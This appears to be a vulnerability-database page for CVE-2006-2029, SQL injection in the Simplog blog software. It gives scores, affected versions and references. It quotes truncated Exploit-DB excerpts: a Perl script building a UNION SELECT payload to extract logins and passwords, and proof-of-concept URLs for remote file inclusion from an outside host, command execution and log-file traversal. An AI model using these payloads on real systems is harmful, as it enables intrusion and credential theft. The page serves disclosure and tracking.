CVE-2006-2029
published 2006-04-26CVE-2006-2029: Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) tid…
PriorityP336medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
2.30%
81.2th percentile
Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) tid parameter in (a) preview.php; the (2) cid, (3) pid, and (4) eid parameters in (b) archive.php; and the (5) pid parameter in (c) comments.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| simplog | simplog | <= 0.9.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Simplog 0.9.3 - 'tid' SQL Injection
exploitdb·2006-04-21
CVE-2006-2029 Simplog 0.9.3 - 'tid' SQL Injection
Simplog 0.9.3 - 'tid' SQL Injection
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=25
#Usage: simplog.pl
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-25\r\n";
print "- Simplog \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to Simplog ex: /simplog/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$spserver = $ARGV[0];
$spserver =~ s/(http:\/\/)//eg;
$sphost = "http://".$spserver;
$spdir = $ARGV[1];
$spport = "80";
$sptar = "preview.php?adm=tem&blogid=1&tid=";
$spxp = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blo
Exploit-DB
Simplog 0.9.2 - 's' Remote Command Execution
exploitdb·2006-04-11
CVE-2006-2029 Simplog 0.9.2 - 's' Remote Command Execution
Simplog 0.9.2 - 's' Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
\r\n";
die;
}
/*
software site: http://www.simplog.org/
description: "Simplog provides an easy way for users to add blogging capabilities
to their existing websites. Simplog is written in PHP and compatible with multiple
databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple......."
i) vulnerable code in doc/index.php at lines:
...
...
nice code, isn't it? :)
poc:
http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu
(but you can submit arguments even trough cookies or POST data...)
or:
http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00
ii)
http://[target]/[path]/index.php?blogid=[sql]
http://[target]/[path]/arc
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0649.htmlhttp://secunia.com/advisories/19764http://securityreason.com/securityalert/799http://securitytracker.com/id?1015976http://www.nukedx.com/?getxpl=25http://www.osvdb.org/24877http://www.osvdb.org/24878http://www.osvdb.org/24879http://www.securityfocus.com/archive/1/431760/100/0/threadedhttp://www.simplog.org/archive.php?blogid=1&pid=57http://www.vupen.com/english/advisories/2006/1493https://exchange.xforce.ibmcloud.com/vulnerabilities/25982http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0649.htmlhttp://secunia.com/advisories/19764http://securityreason.com/securityalert/799http://securitytracker.com/id?1015976http://www.nukedx.com/?getxpl=25http://www.osvdb.org/24877http://www.osvdb.org/24878http://www.osvdb.org/24879http://www.securityfocus.com/archive/1/431760/100/0/threadedhttp://www.simplog.org/archive.php?blogid=1&pid=57http://www.vupen.com/english/advisories/2006/1493https://exchange.xforce.ibmcloud.com/vulnerabilities/25982
2006-04-26
Published